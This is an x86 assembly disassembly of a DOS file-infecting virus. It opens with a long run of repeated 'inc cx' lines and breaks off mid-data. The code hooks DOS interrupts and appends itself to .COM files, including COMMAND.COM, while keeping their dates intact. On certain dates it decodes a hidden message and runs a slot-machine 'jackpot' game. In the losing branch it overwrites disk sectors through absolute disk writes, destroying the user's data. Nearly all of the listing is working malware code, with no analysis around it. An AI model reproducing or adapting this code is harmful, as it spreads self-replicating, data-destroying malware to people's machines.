cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - inc cx - mov ah,9 - mov dx,offset data_25 ; (6AE6:0103=7) - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - int 20h ; Program Terminate - db 0, 0, 0, 0, 0, 0Fh - db 0, 0, 0E9h, 0D3h, 1, 0E9h - db 0, 0, 0, 90h, 0E9h, 78h - db 2Ah, 2Ah, 2Eh, 43h, 4Fh, 4Dh - db 0 - db 'C:\COMMAND.COM' - db 0, 43h, 4Fh, 4Dh, 4Dh, 41h - db 4Eh, 44h, 0FFh - db 2Eh, 43h, 4Fh, 4Dh - db 15 dup (0) - db 3Fh, 0, 0F0h, 3, 2, 0 - db 0B3h, 4Bh, 0FCh, 91h, 56h, 5 - db 79h, 10h, 0, 0, 0, 0 - db 0, 3 - db 8 dup (3Fh) - db 43h, 4Fh, 4Dh, 3Fh, 8, 0 - db 1Eh, 2, 2Eh, 8Bh, 26h, 68h - db 20h, 0A9h, 8Eh, 1Fh, 15h, 0E8h - db 3, 0, 0 - db 'H1000.COM' - db 9 dup (0) - db 1Fh, 15h, 0A9h, 8Eh, 90h, 90h - db 3Dh, 59h, 4Bh, 75h, 4, 0B8h - db 66h, 6, 0CFh, 80h, 0FCh, 11h - db 74h, 8, 80h, 0FCh, 12h, 74h - db 3, 0EBh, 51h, 90h -loc_2: - cmp al,66h ; 'f' - je loc_4 ; Jump if equal - mov al,66h ; 'f' - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - push ax - push bx - push cx - push dx - push es - mov ah,2Fh ; '/' - int 21h ; DOS Services ah=function 2Fh - ; get DTA ptr into es:bx - mov al,es:[bx+10h] - cmp al,43h ; 'C' - jne loc_3 ; Jump if not equal - mov al,es:[bx+11h] - cmp al,4Fh ; 'O' - jne loc_3 ; Jump if not equal - mov al,es:[bx+12h] - cmp al,4Dh ; 'M' - jne loc_3 ; Jump if not equal - mov ax,es:[bx+24h] - cmp ax,91Ah - jb loc_3 ; Jump if below - sub ax,91Ah - mov cx,ax - push cx - mov cx,10h - mov dx,0 - div cx ; ax,dx rem=dx:ax/reg - pop cx - cmp dx,0 - jne loc_3 ; Jump if not equal - mov es:[bx+24h],cx -loc_3: - pop es - pop dx - pop cx - pop bx - pop ax - iret ; Interrupt return -int_24h_entry endp - -loc_4: - push ax - push bx - push cx - push dx - push si - push di - push bp - push ds - push es - mov bx,cs - mov ds,bx - mov al,0 - mov ds:data_18e,al ; (6AE6:004D=0) - mov al,ds:data_13e ; (6AE6:0040=0) - cmp al,0FFh - jne loc_5 ; Jump if not equal - jmp loc_15 ; (06B2) -loc_5: - mov al,0FFh - mov ds:data_13e,al ; (6AE6:0040=0) - cmp ah,4Bh ; 'K' - je loc_6 ; Jump if equal - cmp ah,36h ; '6' - je loc_7 ; Jump if equal - jmp loc_15 ; (06B2) -loc_6: - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov ds:data_12e,al ; (6AE6:003F=0) - jmp short loc_8 ; (0624) - db 90h -loc_7: - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov ds:data_12e,al ; (6AE6:003F=0) - cmp dl,0 - je loc_8 ; Jump if equal - dec dl - mov ah,0Eh - int 21h ; DOS Services ah=function 0Eh - ; set default drive dl (0=a:) -loc_8: - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - cmp al,1 - ja loc_9 ; Jump if above - mov ch,0 - push ds - pop es - mov bx,917h - mov al,1 - call sub_3 ; (07DB) - mov al,1 - call sub_4 ; (07EC) - cmp ah,0 - je loc_9 ; Jump if equal - jmp short loc_14 ; (069C) - db 90h -loc_9: - mov ah,2Fh ; '/' - int 21h ; DOS Services ah=function 2Fh - ; get DTA ptr into es:bx - mov ds:data_14e,bx ; (6AE6:0041=0) - mov ds:data_15e,es ; (6AE6:0043=6AE6h) - mov dx,4Eh - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx - mov dx,0Bh - mov cx,3Fh - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_14 ; Jump if carry Set - mov dx,6Ch - call sub_1 ; (06EE) - cmp dl,1 - jne loc_10 ; Jump if not equal - call sub_2 ; (073C) - jmp short loc_14 ; (069C) - db 90h -loc_10: - cmp dl,3 - je loc_11 ; Jump if equal - jmp short loc_14 ; (069C) - db 90h -loc_11: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_12 ; Jump if carry=0 - jmp short loc_14 ; (069C) - db 90h -loc_12: - mov dx,6Ch - call sub_1 ; (06EE) - cmp dl,1 - jne loc_13 ; Jump if not equal - call sub_2 ; (073C) - jmp short loc_14 ; (069C) - db 90h -loc_13: - cmp dl,3 - je loc_11 ; Jump if equal -loc_14: - mov dl,ds:data_12e ; (6AE6:003F=0) - mov ah,0Eh - int 21h ; DOS Services ah=function 0Eh - ; set default drive dl (0=a:) - mov dx,ds:data_14e ; (6AE6:0041=0) - mov bx,ds:data_15e ; (6AE6:0043=6AE6h) - mov ds,bx - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx -loc_15: - mov ah,0 - mov ds:data_13e,ah ; (6AE6:0040=0) - pop es - pop ds - pop bp - pop di - pop si - pop dx - pop cx - pop bx - pop ax -;* jmp far ptr loc_1 ;*(0273:1460) - db 0EAh, 60h, 14h, 73h, 2 - db 8Ch, 0CAh, 83h, 0C2h, 10h, 8Eh - db 0DAh, 0BAh, 20h, 0, 0B4h, 41h - db 0CDh, 21h, 0B8h, 21h, 35h, 0CDh - db 21h, 8Ch, 6, 0D4h, 1, 89h - db 1Eh, 0D2h, 1, 0BAh, 82h, 0 - db 0B8h, 21h, 25h, 0CDh, 21h, 0BAh - db 1Bh, 0Ch, 0CDh - db 27h - -; -; SUBROUTINE -; - -sub_1 proc near - mov ax,ds:data_19e ; (6AE6:0068=0) - cmp ax,0F5B9h - ja loc_20 ; Jump if above - mov ax,4300h - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx - test cl,4 - jnz loc_20 ; Jump if not zero - test cl,1 - jz loc_16 ; Jump if zero - and cl,0FEh - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx -loc_16: - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - mov dx,3 - mov cx,1 - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - jnc loc_17 ; Jump if carry=0 - jmp short loc_19 ; (0732) - db 90h -loc_17: - cmp ax,0 - jne loc_18 ; Jump if not equal - jmp short loc_19 ; (0732) - db 90h -loc_18: - mov al,byte ptr ds:data_8e+1 ; (6AE6:0003=0) - cmp al,90h - jne loc_21 ; Jump if not equal -loc_19: - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle -loc_20: - mov dl,3 - retn -loc_21: - mov dl,1 - retn -sub_1 endp - - -; -; SUBROUTINE -; - -sub_2 proc near - mov ax,5700h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ds:data_20e,dx ; (6AE6:007E=0) - mov ds:data_21e,cx ; (6AE6:0080=0) - push bx - call sub_5 ; (07FD) - mov bx,68h - mov ax,[bx] - mov dx,0 - mov bx,10h - div bx ; ax,dx rem=dx:ax/reg - inc ax - mov ds:data_10e,ax ; (6AE6:003B=0) - mul bx ; dx:ax = reg * ax - mov ds:data_11e,ax ; (6AE6:003D=0) - pop bx - mov cx,ds:data_10e ; (6AE6:003B=0) - mov si,35Fh - mov [si],cx - mov cx,0 - mov dx,0 - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,605h - mov cx,4 - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - mov cx,0 - mov dx,ds:data_11e ; (6AE6:003D=0) - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,0 - mov cx,91Ah - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - cmp ax,cx - jb loc_22 ; Jump if below - mov al,ds:data_18e ; (6AE6:004D=0) - cmp al,1 - je loc_22 ; Jump if equal - mov cx,0 - mov dx,0 - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov si,9 - mov ax,ds:data_11e ; (6AE6:003D=0) - add ax,35Ch - sub ax,4 - mov [si],ax - mov dx,7 - mov cx,4 - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx -loc_22: - mov dx,ds:data_20e ; (6AE6:007E=0) - mov cx,ds:data_21e ; (6AE6:0080=0) - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - call sub_6 ; (0813) - retn -sub_2 endp - - -; -; SUBROUTINE -; - -sub_3 proc near - push ax - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov dl,al - pop ax - mov dh,0 - mov cl,1 - mov ah,2 - int 13h ; Disk dl=drive #: ah=func b2h - ; read sectors to memory es:bx - retn -sub_3 endp - - -; -; SUBROUTINE -; - -sub_4 proc near - push ax - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov dl,al - pop ax - mov dh,0 - mov cl,1 - mov ah,3 - int 13h ; Disk dl=drive #: ah=func b3h - ; write sectors from mem es:bx - retn -sub_4 endp - - -; -; SUBROUTINE -; - -sub_5 proc near - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_16e,bx ; (6AE6:0045=0) - mov ds:data_17e,es ; (6AE6:0047=6AE6h) - mov dx,335h - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - retn -sub_5 endp - - -; -; SUBROUTINE -; - -sub_6 proc near - mov dx,ds:data_16e ; (6AE6:0045=0) - mov cx,ds:data_17e ; (6AE6:0047=6AE6h) - push ds - push cx - pop ds - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - retn -sub_6 endp - - db 50h, 53h, 51h, 52h, 1Eh, 6 - db 0B4h, 0, 0CDh, 13h, 0B4h, 1 - db 88h, 26h, 4Dh, 0, 0BFh, 0FFh - db 0FFh, 8Eh, 6, 49h, 0, 8Bh - db 1Eh, 4Bh, 0, 0B0h, 0, 26h - db 88h, 7, 7, 1Fh, 5Ah, 59h - db 5Bh, 58h, 0CFh, 8Ch, 0CAh, 0B9h - db 3Fh, 0, 3, 0D1h, 83h, 0C2h - db 10h, 8Eh, 0DAh, 0A1h, 3Dh, 0 - db 5, 3, 6, 0BBh, 0FEh, 0FFh - db 2Bh, 0D8h, 89h, 1Eh, 3, 6 - db 0BBh, 5, 6, 8Ah, 7, 2Eh - db 0A2h, 0, 1, 43h, 8Ah, 7 - db 2Eh, 0A2h, 1, 1, 43h, 8Ah - db 7, 2Eh, 0A2h, 2, 1, 43h - db 8Ah, 7, 2Eh, 0A2h, 3, 1 - db 0B4h, 2Ah, 0CDh, 21h, 80h, 0FAh - db 0Fh, 74h, 3, 0E9h, 0A2h, 1 -loc_23: - cmp dh,1 - je loc_24 ; Jump if equal - cmp dh,4 - je loc_24 ; Jump if equal - cmp dh,8 - je loc_24 ; Jump if equal - jmp loc_36 ; (0A33) -loc_24: - call sub_8 ; (09EB) - push ds - pop es - mov si,613h - mov di,613h - mov cx,305h - cld ; Clear direction - -locloop_25: - lodsb ; String [si] to al - sub al,64h ; 'd' - stosb ; Store al to es:[di] - loop locloop_25 ; Loop if cx > 0 - - mov dx,613h - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx -loc_26: - mov ah,7 - int 21h ; DOS Services ah=function 07h - ; get keybd char al, no echo - mov byte ptr ds:data_2e,64h ; (0000:060D=0) 'd' - nop - mov byte ptr ds:data_3e,78h ; (0000:060E=0) 'x' - nop - mov byte ptr ds:data_4e,0B4h ; (0000:060F=0) - nop - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dh=sec - mov bl,dh - mov bh,0 - mov ch,0 - mov dh,0 - add cl,dl - mov ax,cx - mov cl,3 - div cl ; al, ah rem = ax/reg - mov ds:data_5e,ah ; (0000:0610=0) - mov ax,dx - mov dl,3 - div dl ; al, ah rem = ax/reg - mov ds:data_6e,ah ; (0000:0611=0) - mov ax,bx - div dl ; al, ah rem = ax/reg - mov ds:data_7e,ah ; (0000:0612=0) - dec byte ptr ds:data_1e ; (0000:060C=0) - mov al,ds:data_1e ; (0000:060C=0) - add al,30h ; '0' - mov dh,0Dh - mov dl,26h ; '&' - mov bx,0 - mov ah,2 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - mov ah,0Eh - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode -loc_27: - mov dx,1FFFh -loc_28: - nop - nop - nop - dec dx - jnz loc_28 ; Jump if not zero - mov al,ds:data_2e ; (0000:060D=0) - cmp al,ds:data_5e ; (0000:0610=0) - je loc_29 ; Jump if equal - mov dl,19h - mov al,ds:data_2e ; (0000:060D=0) - call sub_7 ; (09C9) - mov al,ds:data_2e ; (0000:060D=0) - dec al - mov ds:data_2e,al ; (0000:060D=0) -loc_29: - mov al,ds:data_3e ; (0000:060E=0) - cmp al,ds:data_6e ; (0000:0611=0) - je loc_30 ; Jump if equal - mov dl,21h ; '!' - mov al,ds:data_3e ; (0000:060E=0) - call sub_7 ; (09C9) - dec byte ptr ds:data_3e ; (0000:060E=0) -loc_30: - mov al,ds:data_4e ; (0000:060F=0) - cmp al,ds:data_7e ; (0000:0612=0) - je loc_31 ; Jump if equal - mov dl,29h ; ')' - mov al,ds:data_4e ; (0000:060F=0) - call sub_7 ; (09C9) - dec byte ptr ds:data_4e ; (0000:060F=0) -loc_31: - mov al,ds:data_4e ; (0000:060F=0) - cmp al,ds:data_7e ; (0000:0612=0) - jne loc_27 ; Jump if not equal - mov ah,ds:data_3e ; (0000:060E=0) - cmp ah,ds:data_6e ; (0000:0611=0) - jne loc_27 ; Jump if not equal - mov bl,ds:data_2e ; (0000:060D=0) - cmp bl,ds:data_5e ; (0000:0610=0) - jne loc_27 ; Jump if not equal - cmp al,0 - jne loc_32 ; Jump if not equal - cmp ah,0 - jne loc_32 ; Jump if not equal - cmp bl,0 - jne loc_32 ; Jump if not equal - mov dx,80Ah - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - call sub_9 ; (0A18) - jmp short loc_35 ; (09C7) - db 90h -loc_32: - cmp al,1 - jne loc_33 ; Jump if not equal - cmp ah,1 - jne loc_33 ; Jump if not equal - cmp bl,1 - jne loc_33 ; Jump if not equal - mov dx,88Dh - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - jmp short loc_34 ; (09BD) - db 90h -loc_33: - mov al,ds:data_1e ; (0000:060C=0) - cmp al,0 - je loc_34 ; Jump if equal - jmp loc_26 ; (08BF) -loc_34: - mov dx,8D6h - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - jmp short loc_35 ; (09C7) - nop -loc_35: - jmp short loc_35 ; (09C7) - -; -; SUBROUTINE -; - -sub_7 proc near - mov ah,0 - push ax - mov dh,0Bh - mov ah,2 - mov bh,0 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - pop ax - mov bl,3 - div bl ; al, ah rem = ax/reg - mov bl,ah - mov bh,0 - add bx,609h - mov al,[bx] - mov ah,0Eh - mov bx,0 - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - retn -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - push ds - mov bx,ds - add bx,1000h - mov ds,bx - mov bx,0 - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov cx,50h - mov dx,0 - int 25h ; Absolute disk read, drive al - popf ; Pop flags - mov bx,0 - mov ds,bx - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov cx,50h - mov dx,0 - int 26h ; Absolute disk write, drive al - popf ; Pop flags - pop ds - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - push ds - mov bx,ds - add bx,1000h - mov ds,bx - mov bx,0 - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov cx,50h - mov dx,0 - int 26h ; Absolute disk write, drive al - popf ; Pop flags - pop ds - retn -sub_9 endp - -loc_36: - mov bx,0 - mov ax,4B59h - int 21h ; DOS Services ah=function 4Bh - ; run progm @ds:dx, parm @es:bx - cmp ax,666h - jne loc_37 ; Jump if not equal - jmp loc_41 ; (0AF0) -loc_37: - push ds - pop es - push ds - push cs - pop ds - mov si,0 - mov di,917h - mov cx,100h - cld ; Clear direction - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - pop ds - mov ah,2Fh ; '/' - int 21h ; DOS Services ah=function 2Fh - ; get DTA ptr into es:bx - mov ds:data_14e,bx ; (6AE6:0041=0) - mov ds:data_15e,es ; (6AE6:0043=6AE6h) - mov dx,4Eh - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx - mov dx,11h - mov cx,3Fh - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_38 ; Jump if carry Set - mov dx,11h - call sub_1 ; (06EE) - cmp dl,1 - jne loc_38 ; Jump if not equal - call sub_2 ; (073C) -loc_38: - call sub_5 ; (07FD) - mov dx,20h - mov cx,2 - mov ah,3Ch ; '<' - int 21h ; DOS Services ah=function 3Ch - ; create/truncate file @ ds:dx - jc loc_40 ; Jump if carry Set - mov bx,ax - mov dx,0 - mov cx,91Ah - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - push ax - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - pop ax - cmp ax,cx - je loc_39 ; Jump if equal - mov dx,20h - mov ah,41h ; 'A' - int 21h ; DOS Services ah=function 41h - ; delete file, name @ ds:dx - jmp short loc_40 ; (0AD1) - db 90h -loc_39: - push cs - pop es - mov bx,cs:data_8e ; (6AE6:0002=0) - sub bx,92Ch - mov cx,cs - sub bx,cx - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - mov dx,20h - push ds - pop es - mov bx,2Dh - mov ax,4B00h - int 21h ; DOS Services ah=function 4Bh - ; run progm @ds:dx, parm @es:bx -loc_40: - call sub_6 ; (0813) - push cs - pop es - mov di,0 - mov si,917h - mov cx,0FFh - cld ; Clear direction - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - mov dx,ds:data_14e ; (6AE6:0041=0) - mov bx,ds:data_15e ; (6AE6:0043=6AE6h) - mov ds,bx - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx -loc_41: - push cs - pop ds - jmp $-0F32h - jmp $+3DFh - db 48h, 9Bh, 9Ch, 3Fh, 5, 0Ah - db 5, 3, 1, 3, 0, 6Eh - db 71h, 6Dh, 6Dh, 84h, 84h, 84h - db 0A8h, 0ADh, 0B7h, 0AFh, 84h, 0A8h - db 0A9h, 0B7h, 0B8h, 0B6h, 0B3h, 0BDh - db 0A9h, 0B6h, 84h, 5Dh, 84h, 0A5h - db 84h, 0B7h, 0B3h, 0B9h, 0BAh, 0A9h - db 0B2h, 0ADh, 0B6h, 84h, 0B3h, 0AAh - db 84h, 0B1h, 0A5h, 0B0h, 0B8h, 0A5h - db 6Eh, 71h, 6Eh, 71h, 6Dh, 6Dh - db 0ADh, 84h, 0CCh, 0C5h, 0DAh, 0C9h - db 84h, 0CEh, 0D9h, 0D7h, 0D8h, 84h - db 0A8h, 0A9h, 0B7h, 0B8h, 0B6h, 0B3h - db 0BDh, 0A9h, 0A8h, 84h, 0D8h, 0CCh - db 0C9h, 84h, 0AAh, 0A5h, 0B8h, 84h - db 0D3h, 0D2h, 84h, 0DDh, 0D3h, 0D9h - db 0D6h, 84h, 0A8h, 0CDh, 0D7h, 0CFh - db 84h, 85h, 85h, 6Eh, 71h, 84h - db 84h, 84h, 84h, 84h, 84h, 0ACh - db 0D3h, 0DBh, 0C9h, 0DAh, 0C9h, 0D6h - db 90h, 84h, 0ADh, 84h, 0CCh, 0C5h - db 0DAh, 0C9h, 84h, 0C5h, 84h, 0C7h - db 0D3h, 0D4h, 0DDh, 84h, 0CDh, 0D2h - db 84h, 0B6h, 0A5h, 0B1h, 90h, 84h - db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h - db 0D1h, 84h, 0CBh, 0CDh, 0DAh, 0CDh - db 0D2h, 0CBh, 84h, 0DDh, 0D3h, 0D9h - db 84h, 0C5h, 84h, 0D0h, 0C5h, 0D7h - db 0D8h, 84h, 0C7h, 0CCh, 0C5h, 0D2h - db 0C7h, 0C9h, 6Eh, 71h, 6Dh, 6Dh - db 6Dh, 0D8h, 0D3h, 84h, 0D6h, 0C9h - db 0D7h, 0D8h, 0D3h, 0D6h, 0C9h, 84h - db 0DDh, 0D3h, 0D9h, 0D6h, 84h, 0D4h - db 0D6h, 0C9h, 0C7h, 0CDh, 0D3h, 0D9h - db 0D7h, 84h, 0C8h, 0C5h, 0D8h, 0C5h - db 92h, 6Eh, 71h, 84h, 84h, 84h - db 84h, 84h, 0BBh, 0A5h, 0B6h, 0B2h - db 0ADh, 0B2h, 0ABh, 9Eh, 84h, 0ADh - db 0AAh, 84h, 0BDh, 0B3h, 0B9h, 84h - db 0B6h, 0A9h, 0B7h, 0A9h, 0B8h, 84h - db 0B2h, 0B3h, 0BBh, 90h, 84h, 0A5h - db 0B0h, 0B0h, 84h, 0BDh, 0B3h, 0B9h - db 0B6h, 84h, 0A8h, 0A5h, 0B8h, 0A5h - db 84h, 0BBh, 0ADh, 0B0h, 0B0h, 84h - db 0A6h, 0A9h, 84h, 0B0h, 0B3h, 0B7h - db 0B8h, 84h, 91h, 84h, 0AAh, 0B3h - db 0B6h, 0A9h, 0BAh, 0A9h, 0B6h, 84h - db 85h, 85h, 6Eh, 71h, 6Dh, 6Dh - db 84h, 84h, 84h, 0BDh, 0D3h, 0D9h - db 0D6h, 84h, 0A8h, 0C5h, 0D8h, 0C5h - db 84h, 0C8h, 0C9h, 0D4h, 0C9h, 0D2h - db 0C8h, 0D7h, 84h, 0D3h, 0D2h, 84h - db 0C5h, 84h, 0CBh, 0C5h, 0D1h, 0C9h - db 84h, 0D3h, 0CAh, 84h, 0AEh, 0A5h - db 0A7h, 0AFh, 0B4h, 0B3h, 0B8h, 71h - db 6Eh, 71h, 6Eh, 6Dh, 6Dh, 84h - db 84h, 84h, 84h, 84h, 84h, 0A7h - db 0A5h, 0B7h, 0ADh, 0B2h, 0B3h, 84h - db 0A8h, 0A9h, 84h, 0B1h, 0A5h, 0B0h - db 0B8h, 0A9h, 84h, 0AEh, 0A5h, 0A7h - db 0AFh, 0B4h, 0B3h, 0B8h - db 'nqnqmmm-1' - db 1Fh, 6Dh, 2Dh, 31h, 1Fh, 6Dh - db 2Dh, 31h, 1Fh, 6Eh, 71h, 6Dh - db 6Dh, 6Dh, 3Bh, 0, 3Bh, 6Dh - db 3Bh, 0A3h, 3Bh, 6Dh, 3Bh, 0FFh - db ';nqmmm,1 m,1 m,1 nqmmm' - db 84h, 84h, 84h, 84h, 0A7h, 0B6h - db 0A9h, 0A8h, 0ADh, 0B8h, 0B7h, 84h - db 9Eh, 84h, 99h - db 'nqqnqnmmm' - db 0, 0, 0, 84h, 0A1h, 84h - db 0BDh, 0D3h, 0D9h, 0D6h, 84h, 0A8h - db 0CDh, 0D7h, 0CFh, 6Eh, 71h, 6Dh - db 6Dh, 6Dh, 0A3h, 0A3h, 0A3h, 84h - db 0A1h, 84h, 0B1h, 0DDh, 84h, 0B4h - db 0CCh, 0D3h, 0D2h, 0C9h, 84h, 0B2h - db 0D3h, 92h, 6Eh, 71h, 6Eh, 71h - db 6Dh, 6Dh, 6Dh, 0A5h, 0B2h, 0BDh - db 84h, 0AFh, 0A9h, 0BDh, 84h, 0B8h - db 0B3h, 84h, 0B4h, 0B0h, 0A5h, 0BDh - db 'qnqnqnqnqn' - db 88h, 6Eh, 71h, 0A6h, 0A5h, 0B7h - db 0B8h, 0A5h, 0B6h, 0A8h, 84h, 85h - db 84h, 0BDh, 0D3h, 0D9h, 0C4h, 0D6h - db 0C9h, 84h, 0D0h, 0D9h, 0C7h, 0CFh - db 0DDh, 84h, 0D8h, 0CCh, 0CDh, 0D7h - db 84h, 0D8h, 0CDh, 0D1h, 0C9h, 84h - db 91h, 84h, 0C6h, 0D9h, 0D8h, 84h - db 0CAh, 0D3h, 0D6h, 84h, 0DDh, 0D3h - db 0D9h, 0D6h, 84h, 0D3h, 0DBh, 0D2h - db 84h, 0D7h, 0C5h, 0CFh, 0C9h, 90h - db 84h, 0D2h, 0D3h, 0DBh, 6Eh, 71h - db 0B7h, 0BBh, 0ADh, 0B8h, 0A7h, 0ACh - db 84h, 0B3h, 0AAh, 0AAh, 84h, 0BDh - db 0B3h, 0B9h, 0B6h, 84h, 0A7h, 0B3h - db 0B1h, 0B4h, 0B9h, 0B8h, 0A9h, 0B6h - db 84h, 0A5h, 0B2h, 0A8h, 84h, 0A8h - db 0B3h, 0B2h, 0C4h, 0B8h, 84h, 0B8h - db 0B9h, 0B6h -loc_42: - mov dl,84h - lodsw ; String [si] to ax - mov ax,0B384h - mov dl,84h - mov ax,0B0ADh - mov al,84h - mov ax,0B1B3h - mov bl,0B6h - mov dh,0B3h - mov bx,8584h - test ax,ds:data_33e[di] ; (6AE6:716E=0) - mov [bp+71h],ch - mov dl,0D3h - test ch,[bp+si-3827h] - iret ; Interrupt return - db 0CDh, 0D2h, 0C4h, 84h, 0A7h, 0CCh - db 0C5h, 0D2h, 0C7h, 0C9h, 9Fh, 84h - db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h - db 0D1h, 84h, 0D4h, 0D9h, 0D2h, 0CDh - db 0D7h, 0CCh, 0CDh, 0D2h, 0CBh, 84h - db 0DDh, 0D3h, 0D9h, 84h, 0CAh, 0D3h - db 0D6h, 84h, 0D8h, 0D6h, 0DDh, 0CDh - db 0D2h, 0CBh, 84h, 0D8h, 0D3h, 84h - db 0D8h, 0D6h, 0C5h, 0C7h, 0C9h, 84h - db 0D1h, 0C9h, 84h, 0C8h, 0D3h, 0DBh - db 0D2h, 84h, 85h, 88h, 6Eh, 71h - db 0ACh, 0A5h, 84h, 0ACh, 0A5h, 84h - db 85h, 85h, 84h, 0BDh, 0D3h, 0D9h - db 